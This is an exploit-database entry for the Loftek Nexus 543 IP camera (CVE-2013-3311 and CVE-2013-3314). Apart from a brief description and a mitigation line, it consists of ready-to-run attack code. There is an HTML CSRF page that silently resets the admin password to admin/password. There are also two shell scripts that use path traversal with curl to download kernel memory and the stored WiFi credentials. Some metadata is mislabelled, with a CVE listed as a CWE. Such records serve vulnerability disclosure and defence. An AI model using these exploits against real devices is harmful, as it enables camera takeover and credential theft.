Loftek Nexus 543 CSRF PoC

vendor:

Nexus 543 IP Camera

by:

Independent Security Researcher

7,5

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Nexus 543 IP Camera

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: CVE-2013-3311

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

This exploit allows an attacker to reset the admin password of a Loftek Nexus 543 IP camera by sending a maliciously crafted HTTP request. This exploit was discovered by an independent security researcher in 2013 and was assigned CVE-2013-3311.

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of security measures such as same-site cookies, anti-CSRF tokens, and origin header checks.

Source

Exploit-DB raw data:

CSRF:

<HTML><TITLE>Loftek Nexus 543 CSRF PoC</TITLE>
<IMG SRC="http://ip-camera-address/set_users.cgi?next_url=rebootme.htm&user1=admin&pwd1=password&pri1=2&user2=anon&pwd2=password&pri2=0&user3=&pwd3=&pri3=1&user4=&pwd4=&pri4=0&user5=&pwd5=&pri5=0&user6=&pwd6=&pri6=0&user7=&pwd7=&pri7=0&user8=&pwd8=&pri8=0" ALT="Your password has been reset to admin/password">
</HTML>


Memory Dump:

#!/bin/sh
# This script exploits CVE-2013-3311 to retrieve kernel memory from a Loftek Nexus 543 IP camera
# The file which is downloaded can be analyzed (strings) to recover passwords and other goodies


if [[ "$1x" != "x" && "$2x" != "x" ]]; then
	curl http://$1/../proc/kcore -o $2 
	exit
fi
echo "Usage: $0 Nexus-543-IP output_file" 

WiFi Creds:


#!/bin/sh
# This script exploits CVE-2013-3314 to retrieve wifi credentials from a Loftek Nexus 543 IP camera

if [ "$1x" != "x" ]; then
	curl http://$1/../etc/RT2870STA.dat
	exit
fi
echo "Usage: $0 Nexus-543-IP"